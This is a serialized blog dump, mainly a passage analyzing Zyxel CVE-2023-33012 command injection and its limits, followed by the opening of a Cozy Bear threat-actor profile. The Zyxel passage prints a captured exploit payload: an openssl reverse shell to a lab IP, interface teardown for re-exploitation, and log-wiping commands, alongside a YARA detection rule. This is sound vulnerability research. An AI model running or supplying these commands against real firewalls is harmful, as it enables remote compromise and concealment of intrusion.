conf_str",[1373,79009,11875],{"class":1383},[1373,79011,79012,79014,79016,79018,79020,79022],{"class":1375,"line":4798},[1373,79013,63790],{"class":1379},[1373,79015,1384],{"class":1383},[1373,79017,183],{"class":1387},[1373,79019,78842],{"class":1391},[1373,79021,183],{"class":1387},[1373,79023,11875],{"class":1383},[1373,79025,79026],{"class":1375,"line":4806},[1373,79027,79028],{"class":4636},"        return\n",[18,79030,79031],{},"In that way, we were able to scan the internet-facing Zyxel devices to determine how many used the vulnerable configuration. 
Of the ~7,600 that were using vulnerable firmware, we found only 607 that were using the vulnerable configuration.",[1925,79033,79034],{},[18,79035,79036],{},"Configuration of Zyxel Firewalls Using Firmware Affected By CVE-2023-33012",[78559,79038],{":labels":79039,":values":79040},"[\"SD-WAN Disabled (Not Vulnerable)\",\"SD-WAN Enabled\"]","[6990,607]",[18,79042,79043],{},"From the initial analysis, we went all the way from “Zyxel firewalls are affected by an unauthenticated remote command injection” to “Zyxel firewalls using an uncommon configuration are affected by unauthenticated remote command injection.” Which is a pretty important asterisk that got left out.",[18,79045,79046],{},"But that’s not the only caveat. There’s more.",[61,79048,79050],{"id":79049},"you-get-one-shot","You Get One Shot",[18,79052,79053,79054,79057,79058,79061],{},"The exploitation described by SSD is clever and fun to play with. The attacker can write arbitrary data to a file of their choosing using the ",[886,79055,79056],{},"option proto vti"," configuration (which Zyxel did not appear to fix in the 5.37.0 release). The attacker can then execute the file using a command injection in the ",[886,79059,79060],{},"option proto gre"," configuration. The command injection is space-limited to the point that executing a pre-upload file is the only option, so these two things work really well together.",[18,79063,79064],{},"The problem is that you can only do it once.",[18,79066,79067,79068,79070],{},"Looking at (edited) ",[886,79069,36300],{}," after exploitation, we see the following:",[1354,79072,79074],{"className":31740,"code":79073,"language":2186,"meta":219,"style":219},"root  14602  S 07:14   0:00 sh -c ip addr add ; . 
\u002Ftmp\u002FfYW.qsr; #\u002F24 brd + dev gre1\nroot  14606  S 07:14   0:00  \\_ sh -i\nroot  14649  R 07:14   0:00  |   \\_ ps faux\nroot  14607  S 07:14   0:00  \\_ openssl s_client -quiet -connect 10.12.70.252:1271\n",[886,79075,79076,79117,79138,79164],{"__ignoreMap":219},[1373,79077,79078,79080,79083,79086,79089,79092,79094,79096,79099,79102,79105,79107,79109,79112,79114],{"class":1375,"line":1376},[1373,79079,48771],{"class":2206},[1373,79081,79082],{"class":5467},"  14602",[1373,79084,79085],{"class":1391},"  S",[1373,79087,79088],{"class":1391}," 07:14",[1373,79090,79091],{"class":1391},"   0:00",[1373,79093,2236],{"class":1391},[1373,79095,45587],{"class":2209},[1373,79097,79098],{"class":1391}," ip",[1373,79100,79101],{"class":1391}," addr",[1373,79103,79104],{"class":1391}," add",[1373,79106,57171],{"class":1383},[1373,79108,1398],{"class":1379},[1373,79110,79111],{"class":1391}," \u002Ftmp\u002FfYW.qsr",[1373,79113,39663],{"class":1383},[1373,79115,79116],{"class":4630}," #\u002F24 brd + dev gre1\n",[1373,79118,79119,79121,79124,79126,79128,79130,79133,79135],{"class":1375,"line":220},[1373,79120,48771],{"class":2206},[1373,79122,79123],{"class":5467},"  14606",[1373,79125,79085],{"class":1391},[1373,79127,79088],{"class":1391},[1373,79129,79091],{"class":1391},[1373,79131,79132],{"class":2326},"  \\_",[1373,79134,2236],{"class":1391},[1373,79136,79137],{"class":2209}," -i\n",[1373,79139,79140,79142,79145,79148,79150,79152,79155,79158,79161],{"class":1375,"line":1266},[1373,79141,48771],{"class":2206},[1373,79143,79144],{"class":5467},"  14649",[1373,79146,79147],{"class":1391},"  R",[1373,79149,79088],{"class":1391},[1373,79151,79091],{"class":1391},[1373,79153,79154],{"class":1397},"  |",[1373,79156,79157],{"class":2206},"   \\_",[1373,79159,79160],{"class":1391}," ps",[1373,79162,79163],{"class":1391}," 
faux\n",[1373,79165,79166,79168,79171,79173,79175,79177,79179,79182,79185,79188,79191],{"class":1375,"line":1852},[1373,79167,48771],{"class":2206},[1373,79169,79170],{"class":5467},"  14607",[1373,79172,79085],{"class":1391},[1373,79174,79088],{"class":1391},[1373,79176,79091],{"class":1391},[1373,79178,79132],{"class":2326},[1373,79180,79181],{"class":1391}," openssl",[1373,79183,79184],{"class":1391}," s_client",[1373,79186,79187],{"class":2209}," -quiet",[1373,79189,79190],{"class":2209}," -connect",[1373,79192,79193],{"class":1391}," 10.12.70.252:1271\n",[18,79195,79196,79197,79200,79201,79204],{},"The injection occurs during an attempted ",[886,79198,79199],{},"ip addr \u003Cuser provided>\u002F24 brd + dev gre1"," command. The offending code from ",[886,79202,79203],{},"\u002Fusr\u002Fsbin\u002Fsdwan_interface"," is easy to visualize in a decompiler. The order of operations turns out to be very important, but below, you can see the software brings up the GRE interface, sets the multicast transmit queue size, and auto-configures the broadcast address (where exploitation finally occurs):",[18,79206,79207],{},[68,79208],{":width":10862,"alt":79209,"src":79210},"Decompiled output from sdwan_interface","\u002Fblog\u002Fzyxel-cve-2023-33012\u002Fdecompiled-CVE-2023-33012.png",[18,79212,79213,79214,4606],{},"Upon failure of the final command, the following is logged to ",[886,79215,79216],{},"\u002Ftmp\u002Fsdwan_interface\u002Fsdwan_interface.log",[1354,79218,79221],{"className":79219,"code":79220,"language":1359},[1357],"[Fri Feb 16 19:58:49 2024] [zld_interface_server:806] name=xBwHq, reset_interface=1\n[Fri Feb 16 19:58:50 2024] [add_gre_tunnel:435] add_gre_tunnel [ERROR]: cmd error[32512]: ip addr add ; . 
\u002Ftmp\u002FMGb.qsr; #\u002F24 brd + dev gre1\n[Fri Feb 16 19:58:50 2024] [apply_zone_to_kernel:22] apply zone to kernel = 1, 21, gre1\n",[886,79222,79220],{"__ignoreMap":219},[18,79224,79225,79226,79229],{},"The logging and decompilation screenshots are important because they provide evidence of why this vulnerability ",[1131,79227,79228],{},"can only be exploited once",". A subsequent exploit attempt generates the following log:",[1354,79231,79234],{"className":79232,"code":79233,"language":1359},[1357],"[Fri Feb 16 20:10:59 2024] [zld_interface_server:806] name=XsDfb, reset_interface=1\n[Fri Feb 16 20:10:59 2024] [add_gre_tunnel:420] add_gre_tunnel [ERROR]: cmd error[65280]: ifconfig gre2 up\n[Fri Feb 16 20:10:59 2024] [apply_zone_to_kernel:22] apply zone to kernel = 1, 21, gre2\n",[886,79235,79233],{"__ignoreMap":219},[18,79237,79238,79239,79242,79243,79246,79247,79249,79250,79253],{},"Here we see that the firewall has attempted operations on a new GRE interface (",[886,79240,79241],{},"gre2","), but the command ",[886,79244,79245],{},"ifconfig gre2 up"," fails. The interface doesn’t exist. When ",[886,79248,79245],{}," fails, ",[886,79251,79252],{},"ip addr add"," is never executed. The first successful exploitation leaves the firewall in a state where it cannot be exploited again! This important caveat was certainly never mentioned.",[18,79255,79256,79257,79259],{},"An attacker who knows what they are doing ",[1131,79258,57415],{}," work around this limitation. If the attacker removes the old GRE interface, the software will bring up a new one. 
Our post-exploitation script has something like:",[1354,79261,79263],{"className":31740,"code":79262,"language":2186,"meta":219,"style":219},"ifconfig gre1 down; ip tunnel del gre1 mode gre;\n",[886,79264,79265],{"__ignoreMap":219},[1373,79266,79267,79269,79272,79275,79277,79279,79282,79285,79287,79289,79292],{"class":1375,"line":1376},[1373,79268,55390],{"class":2206},[1373,79270,79271],{"class":1391}," gre1",[1373,79273,79274],{"class":1391}," down",[1373,79276,39663],{"class":1383},[1373,79278,79098],{"class":2206},[1373,79280,79281],{"class":1391}," tunnel",[1373,79283,79284],{"class":1391}," del",[1373,79286,79271],{"class":1391},[1373,79288,76181],{"class":1391},[1373,79290,79291],{"class":1391}," gre",[1373,79293,4912],{"class":1383},[18,79295,79296,79297,79299,79300,79302],{},"The next time the target is exploited, it will successfully create ",[886,79298,79241],{},", which allows ",[886,79301,79245],{}," to run successfully and open up access to the vulnerable command.",[61,79304,79305],{"id":25141},"Exploitation in the Wild",[18,79307,79308,79309,10515,79314,79319,79320,79323],{},"The SSD writeup ",[47,79310,79313],{"href":79311,"rel":79312},"https:\u002F\u002Fwww.reddit.com\u002Fr\u002Fnetsec\u002Fcomments\u002F19f9q8c\u002Fnew_zyxel_rce_vulnerability_allows_remote\u002F",[51],"gained",[47,79315,79318],{"href":79316,"rel":79317},"https:\u002F\u002Ftwitter.com\u002Fptracesecurity\u002Fstatus\u002F1751289074537619646",[51],"some"," attention, so we were interested in whether anyone had attempted to exploit it in the wild. For whatever reason, the firewalls make the ZTP log available to remote and unauthenticated users through the ",[886,79321,79322],{},"\u002Fztp\u002Fcgi-bin\u002Fdumpztplog.py"," endpoint. 
In that log file, an exploitation attempt will look something like this:",[1354,79325,79328],{"className":79326,"code":79327,"language":1359},[1357],"INFO:root:ztp_led_start\nINFO:root:sending \"1\"\nINFO:root:closing socket\nINFO:root:init\nINFO:root:setting up vti interface\nINFO:root:((cd=\u002Ftmp; mknod Hua p; sh -i \u003C Hua 2>&1 | openssl s_client -quiet -connect 10.12.70.252:1270 > Hua; rm Hua;)&);((sleep 20; ifconfig gre1 down; ip tunnel del gre1 mode gre; rm \u002Fvar\u002Flog\u002Fztplog \u002Ftmp\u002Fsdwan_interface\u002Fsdwan_interface.log \u002Ftmp\u002F*.qsr)&);; name=EAg; proto=vti\nINFO:root:parse config error : {'((cd': '\u002Ftmp; mknod Hua p; sh -i \u003C Hua 2>&1 | openssl s_client -quiet -connect 10.12.70.252:1270 > Hua; rm Hua;)&);((sleep 20; ifconfig gre1 down; ip tunnel del gre1 mode gre; rm \u002Fvar\u002Flog\u002Fztplog \u002Ftmp\u002Fsdwan_interface\u002Fsdwan_interface.log \u002Ftmp\u002F*.qsr)&);', 'name': 'EAg', 'proto': 'vti'}\nINFO:root:KeyError('ipaddr',)\nINFO:root:ztp_led_start\nINFO:root:sending \"1\"\nINFO:root:closing socket\nINFO:root:init\nINFO:root:setting up gre interface\nINFO:root:name=XsDfb; proto=gre; ipaddr=; . \u002Ftmp\u002FEAg.qsr; #; localip=127.0.0.1; netmask=24; remoteip=127.0.0.1; gateway=0\n[IPC]argc = 8\n[IPC]IPC result: 1 \n",[886,79329,79327],{"__ignoreMap":219},[18,79331,79332,79333,79336,79337,79340],{},"Above, you can see both the file write (line ending with ",[886,79334,79335],{},"proto=vti",") and the command injection (line ending with ",[886,79338,79339],{},"gateway=0",") are present. 
A very simple YARA rule to parse the logs for exploitation looks like:",[1354,79342,79345],{"className":79343,"code":79344,"language":1359},[1357],"rule Zyxel_CVE_2023_33012\n{\n    meta:\n        description = \"Zyxel ZTP Config Parser Exploit Attempt\"\n        path_pattern = \"\u002Fztp\u002Fcgi-bin\u002Fdumpztplog.py\"\n    strings:\n        $vti = \"proto=vti\"\n        $gre = \"proto=gre\"\n        $tmp = \"\u002Ftmp\u002F\"\n        $qsr = \".qsr\"\n    condition:\n        all of them\n}\n",[886,79346,79344],{"__ignoreMap":219},[18,79348,79349],{},"We grabbed the ZTP logs of all ~7,600 firewalls using vulnerable firmware and found… absolutely nothing that looked like an exploitation attempt. Of course, the ZTP log is deleted on reboot (and an attacker can delete it on exploitation), but this seems like a reasonable indicator that it isn’t being widely exploited.",[18,79351,79352,79353,79356],{},"We did find 18,000+ log entries that read, ",[886,79354,79355],{},"ERROR:root:Cannot find sdwan_interface socket [\u002Ftmp\u002Fsdw_iface_server.sock]!"," This does prove the interface is seeing traffic, but because those endpoints aren’t vulnerable, we see nothing more in the logs.",[18,79358,79359,79360,79363,79364,79369,79370,79373],{},"As a final attempt to determine if this is being actively exploited in the wild, we turned to our friends at GreyNoise. Looking at ",[886,79361,79362],{},"raw_data.web.paths:\"\u002Fztp\u002Fcgi-bin\u002Fparse_config.py\""," shows ",[47,79365,79368],{"href":79366,"rel":79367},"https:\u002F\u002Fviz.greynoise.io\u002Fquery\u002Fraw_data.web.paths:%22%2Fztp%2Fcgi-bin%2Fparse_config.py%22",[51],"no results",", so they aren’t seeing the exploit hit their honeypots. 
They do see one IP address doing Zyxel version probing via ",[886,79371,79372],{},"zld_product_spec.js"," just like the SSD proof of concept, but that's about it.",[18,79375,79376],{},[68,79377],{":width":10862,"alt":79378,"src":79379},"GreyNoise flagged IP scanning for Zyxel","\u002Fblog\u002Fzyxel-cve-2023-33012\u002Fgreynoise-zyxel-scanning.png",[18,79381,79382],{},"There’s basically no evidence that this vulnerability is being exploited in the wild at any scale, and with so few vulnerable targets remaining, we assume it never will be.",[61,79384,1903],{"id":1902},[18,79386,79387],{},"The goal of vulnerability disclosure should be to inform and provide actionable intelligence. Publishing incorrect, obfuscated, and\u002For misleading information wastes everyone’s time and only introduces more FUD to an industry that is already drowning in it. This Zyxel firewall issue did not live up to the disclosure. It only affects a specific configuration, is not easy to re-exploit, and was assigned a CVE when patched six months ago. 
Most Zyxel users needn’t have ever worried about it.",[61,79389,202],{"id":201},[18,79391,63449,79392,982,79395,65315,79398,982,79401,63288],{},[47,79393,40447],{"href":53829,"rel":79394},[51],[47,79396,55229],{"href":53837,"rel":79397},[51],[47,79399,1245],{"href":45535,"rel":79400},[51],[47,79402,216],{"href":214,"rel":79403},[51],[2901,79405,79406],{},"html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sAZ-3, html code.shiki .sAZ-3{--shiki-light:#6182B8;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .s_MOj, html code.shiki .s_MOj{--shiki-light:#E2931D;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sMLJd, html code.shiki 
.sMLJd{--shiki-light:#6182B8;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#66D9EF}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .srJo8, html code.shiki 
.srJo8{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sMTiH, html code.shiki .sMTiH{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .squCx, html code.shiki .squCx{--shiki-light:#E53935;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sYoWi, html code.shiki .sYoWi{--shiki-light:#E53935;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .ss7Ak, html code.shiki .ss7Ak{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#6A737D;--shiki-default-font-style:inherit;--shiki-dark:#6A737D;--shiki-dark-font-style:inherit;--shiki-sepia:#88846F;--shiki-sepia-font-style:inherit}html pre.shiki code .sQeA1, html code.shiki .sQeA1{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}",{"title":219,"searchDepth":220,"depth":220,"links":79408},[79409,79410,79411,79412,79413,79414],{"id":11647,"depth":220,"text":11648},{"id":78574,"depth":220,"text":78575},{"id":79049,"depth":220,"text":79050},{"id":25141,"depth":220,"text":79305},{"id":1902,"depth":220,"text":1903},{"id":201,"depth":220,"text":202},"2024-02-21","VulnCheck uncovers the truth behind the recently published Zyxel pre-auth remote code execution: limited to specific configurations, limitations on repeated exploitation, and no 
evidence of active exploitation.",{"slug":79418},"zyxel-cve-2023-33012","\u002Fblog\u002Fzyxel-cve-2023-33012",{"title":58315,"description":79416},"blog\u002Fzyxel-cve-2023-33012",[242,23275],"RPoTvYySiHkg3a3UxxYrmKLBVbCky-S7rlq8rNDGcUk",{"id":79425,"title":79426,"articles":79427,"authors":79436,"body":79438,"date":81086,"description":79448,"extension":234,"image":7,"link":7,"meta":81087,"navigation":237,"path":81089,"seo":81090,"series":7,"stem":81091,"subtype":7,"tags":81092,"__hash__":81093},"blog\u002Fblog\u002Fhow-we-think-about-threat-actors.md","Reimagining How We Think About Threat Actors",[79428,79432],{"title":79429,"source":61436,"link":79430,"date":79431},"Risky Biz News: New NSO Group capability revealed in court documents","https:\u002F\u002Fnews.risky.biz\u002Frisky-biz-news-new-nso-group-capability-revealed-in-court-documents\u002F?ref=risky-business-news-newsletter","2024-02-19",{"title":79433,"source":3508,"link":79434,"date":79435},"A Look at the UK's National Cyber Security Centre's Vulnerability Management Guidance","https:\u002F\u002Fresilientcyber.substack.com\u002Fp\u002Fa-look-at-the-uks-national-cyber","2024-02-25",[79437],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":79439,"toc":81077},[79440,79446,79449,79452,79455,79458,79462,79465,79471,79474,79697,79701,79704,79710,79713,80374,80378,80381,80387,80390,80611,80615,80618,80624,80627,81049,81053,81056,81060,81064,81067,81069,81074],[18,79441,79442],{},[68,79443],{":width":10862,"alt":79444,"src":79445},"Threat-Actors-Cozy-Bear","\u002Fblog\u002Fhow-we-think-about-threat-actors\u002FCozy-Bear-Threat-Actor.png",[18,79447,79448],{},"Taking a data-driven approach to visualizing the profile of threat actors can provide meaningful information without the time-consuming process of sifting through lengthy reports of information.",[18,79450,79451],{},"Let’s explore how we can accomplish this through the exercise in exploring a threat actor with a simple question…\nWhat do Cozy 
Bear, APT29, Midnight Blizzard, Zimbra, Exchange, TeamCity, CVE-2023-42793, CVE-2021-1879, China, United States, TI053-005 and TI548-002 all have in common?",[18,79453,79454],{},"They are all associated with the same threat actor often referred to as Cozy Bear (Crowdstrike), APT29 (Mandiant), Midnight Blizzard (Microsoft), or one of the other 13 names the Russian nation-state threat actor has been given.",[18,79456,79457],{},"When it comes to the anatomies of threat actors, there are many different attributes, techniques and tactics to be explored. Using VulnCheck’s Threat Actor API Endpoint, I now have quick access to broad intelligence on threat actors. From there I can pivot to additional vulnerability\u002Fexploitation data to expand a threat actor’s profile in the future. But, before I jump into the weeds too deep, let’s start by exploring the basic anatomy of a single threat actor: Cozy Bear.",[61,79459,79461],{"id":79460},"threat-actor-identifiers-aliases","Threat Actor Identifiers \u002F Aliases",[18,79463,79464],{},"We can start by exploring a threat actor using one of multiple names or IDs generated by Mitre, MISP, Malpedia, Crowdstrike and\u002For Microsoft. Here we can see that Cozy Bear, the name used by Crowdstrike, is the one we default to as the primary name. 
Microsoft refers to the same threat actor as “Midnight Blizzard,” and both Mandiant and Mitre refer to it as “APT 29.” In total there are 15 threat actor names associated with Cozy Bear… that we know of.",[18,79466,79467],{},[68,79468],{":width":10862,"alt":79469,"src":79470},"Threat-Actors-Cozy-Bear-Aliases","\u002Fblog\u002Fhow-we-think-about-threat-actors\u002FCozy-Bear-Aliases.png",[18,79472,79473],{},"Example JSON Threat Actor Names:",[1354,79475,79477],{"className":22307,"code":79476,"language":22309,"meta":219,"style":219},"  \"threat_actor_name\": \"Cozy Bear\",\n  \"date_added\": \"2016-08-04\",\n  \"mitre_id\": \"G0016\",\n  \"misp_id\": \"b2056ff0-00b9-482e-b11c-c771daa5f28a\",\n  \"malpedia_url\": \"https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Factor\u002Fapt29\",\n  \"vendor_names_for_threat_actors\": [\n    {\n      \"vendor_name\": \"CrowdStrike\",\n      \"threat_actor_name\": \"Cozy Bear\"\n    },\n    {\n      \"vendor_name\": \"Microsoft\",\n      \"threat_actor_name\": \"Midnight Blizzard\",\n      \"url\": \"https:\u002F\u002Flearn.microsoft.com\u002Fen-us\u002Fmicrosoft-365\u002Fsecurity\u002Fintelligence\u002Fmicrosoft-threat-actor-naming\"\n    }\n",[886,79478,79479,79499,79518,79538,79558,79578,79591,79595,79615,79631,79635,79639,79657,79676,79693],{"__ignoreMap":219},[1373,79480,79481,79483,79486,79488,79490,79492,79495,79497],{"class":1375,"line":1376},[1373,79482,23732],{"class":1387},[1373,79484,79485],{"class":1391},"threat_actor_name",[1373,79487,183],{"class":1387},[1373,79489,20051],{"class":4640},[1373,79491,183],{"class":1387},[1373,79493,79494],{"class":1391},"Cozy 
Bear",[1373,79496,183],{"class":1387},[1373,79498,9062],{"class":4640},[1373,79500,79501,79503,79505,79507,79509,79511,79514,79516],{"class":1375,"line":220},[1373,79502,23732],{"class":1387},[1373,79504,12998],{"class":1391},[1373,79506,183],{"class":1387},[1373,79508,20051],{"class":4640},[1373,79510,183],{"class":1387},[1373,79512,79513],{"class":1391},"2016-08-04",[1373,79515,183],{"class":1387},[1373,79517,9062],{"class":4640},[1373,79519,79520,79522,79525,79527,79529,79531,79534,79536],{"class":1375,"line":1266},[1373,79521,23732],{"class":1387},[1373,79523,79524],{"class":1391},"mitre_id",[1373,79526,183],{"class":1387},[1373,79528,20051],{"class":4640},[1373,79530,183],{"class":1387},[1373,79532,79533],{"class":1391},"G0016",[1373,79535,183],{"class":1387},[1373,79537,9062],{"class":4640},[1373,79539,79540,79542,79545,79547,79549,79551,79554,79556],{"class":1375,"line":1852},[1373,79541,23732],{"class":1387},[1373,79543,79544],{"class":1391},"misp_id",[1373,79546,183],{"class":1387},[1373,79548,20051],{"class":4640},[1373,79550,183],{"class":1387},[1373,79552,79553],{"class":1391},"b2056ff0-00b9-482e-b11c-c771daa5f28a",[1373,79555,183],{"class":1387},[1373,79557,9062],{"class":4640},[1373,79559,79560,79562,79565,79567,79569,79571,79574,79576],{"class":1375,"line":4692},[1373,79561,23732],{"class":1387},[1373,79563,79564],{"class":1391},"malpedia_url",[1373,79566,183],{"class":1387},[1373,79568,20051],{"class":4640},[1373,79570,183],{"class":1387},[1373,79572,79573],{"class":1391},"https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Factor\u002Fapt29",[1373,79575,183],{"class":1387},[1373,79577,9062],{"class":4640},[1373,79579,79580,79582,79585,79587,79589],{"class":1375,"line":4724},[1373,79581,23732],{"class":1387},[1373,79583,79584],{"class":1391},"vendor_names_for_threat_actors",[1373,79586,183],{"class":1387},[1373,79588,20051],{"class":4640},[1373,79590,9050],{"class":1383},[1373,79592,79593],{"class":1375,"line":4756},[1373,79594,9613],{"class":1383
},[1373,79596,79597,79599,79602,79604,79606,79608,79611,79613],{"class":1375,"line":4768},[1373,79598,26357],{"class":9152},[1373,79600,79601],{"class":9155},"vendor_name",[1373,79603,183],{"class":9152},[1373,79605,4606],{"class":1383},[1373,79607,4883],{"class":9173},[1373,79609,79610],{"class":9176},"CrowdStrike",[1373,79612,183],{"class":9173},[1373,79614,9062],{"class":1383},[1373,79616,79617,79619,79621,79623,79625,79627,79629],{"class":1375,"line":4792},[1373,79618,26357],{"class":9152},[1373,79620,79485],{"class":9155},[1373,79622,183],{"class":9152},[1373,79624,4606],{"class":1383},[1373,79626,4883],{"class":9173},[1373,79628,79494],{"class":9176},[1373,79630,19057],{"class":9173},[1373,79632,79633],{"class":1375,"line":4798},[1373,79634,26468],{"class":1383},[1373,79636,79637],{"class":1375,"line":4806},[1373,79638,9613],{"class":1383},[1373,79640,79641,79643,79645,79647,79649,79651,79653,79655],{"class":1375,"line":4817},[1373,79642,26357],{"class":9152},[1373,79644,79601],{"class":9155},[1373,79646,183],{"class":9152},[1373,79648,4606],{"class":1383},[1373,79650,4883],{"class":9173},[1373,79652,3129],{"class":9176},[1373,79654,183],{"class":9173},[1373,79656,9062],{"class":1383},[1373,79658,79659,79661,79663,79665,79667,79669,79672,79674],{"class":1375,"line":4825},[1373,79660,26357],{"class":9152},[1373,79662,79485],{"class":9155},[1373,79664,183],{"class":9152},[1373,79666,4606],{"class":1383},[1373,79668,4883],{"class":9173},[1373,79670,79671],{"class":9176},"Midnight 
Blizzard",[1373,79673,183],{"class":9173},[1373,79675,9062],{"class":1383},[1373,79677,79678,79680,79682,79684,79686,79688,79691],{"class":1375,"line":4835},[1373,79679,26357],{"class":9152},[1373,79681,7585],{"class":9155},[1373,79683,183],{"class":9152},[1373,79685,4606],{"class":1383},[1373,79687,4883],{"class":9173},[1373,79689,79690],{"class":9176},"https:\u002F\u002Flearn.microsoft.com\u002Fen-us\u002Fmicrosoft-365\u002Fsecurity\u002Fintelligence\u002Fmicrosoft-threat-actor-naming",[1373,79692,19057],{"class":9173},[1373,79694,79695],{"class":1375,"line":4843},[1373,79696,4795],{"class":1383},[61,79698,79700],{"id":79699},"misp-suspected-victims-target-category-incident-type-threat-actor-operating-country-synonyms","MISP Suspected Victims \u002F Target Category \u002F Incident Type \u002F Threat Actor Operating Country \u002F Synonyms",[18,79702,79703],{},"Now we need to bring some color to the threat actor’s profile. Using MISP data we learn that the threat actor is Russian state-sponsored, focused on cyber espionage, targeting government and private sector entities located in the United States, China, New Zealand, Ukraine, Romania, Georgia, Japan, South Korea, Belgium, Kazakhstan, Brazil, Mexico, Turkey, Portugal and India. Country flags bring color to the threat actor profile. 
This is the threat actor profile version of Bob Ross’ “Happy Trees!”.",[18,79705,79706],{},[68,79707],{":width":10862,"alt":79708,"src":79709},"Threat-Actors-Cozy-Bear-MISP","\u002Fblog\u002Fhow-we-think-about-threat-actors\u002FCozy-Bear-Suspected-Victims.png",[18,79711,79712],{},"Example JSON MISP Data:",[1354,79714,79716],{"className":22307,"code":79715,"language":22309,"meta":219,"style":219},"\"misp_threat_actor\": {\n  \"description\": \"A 2015 report by F-Secure describe APT29 as: 'The Dukes are a well-resourced, highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making. The Dukes show unusual confidence in their ability to continue successfully compromising their targets, as well as in their ability to operate with impunity. The Dukes primarily target Western governments and related organizations, such as government ministries and agencies, political think tanks, and governmental subcontractors. Their targets have also included the governments of members of the Commonwealth of Independent States;Asian, African, and Middle Eastern governments;organizations associated with Chechen extremism;and Russian speakers engaged in the illicit trade of controlled substances and drugs. The Dukes are known to employ a vast arsenal of malware toolsets, which we identify as MiniDuke, CosmicDuke, OnionDuke, CozyDuke, CloudDuke, SeaDuke, HammerDuke, PinchDuke, and GeminiDuke. In recent years, the Dukes have engaged in apparently biannual large - scale spear - phishing campaigns against hundreds or even thousands of recipients associated with governmental institutions and affiliated organizations. 
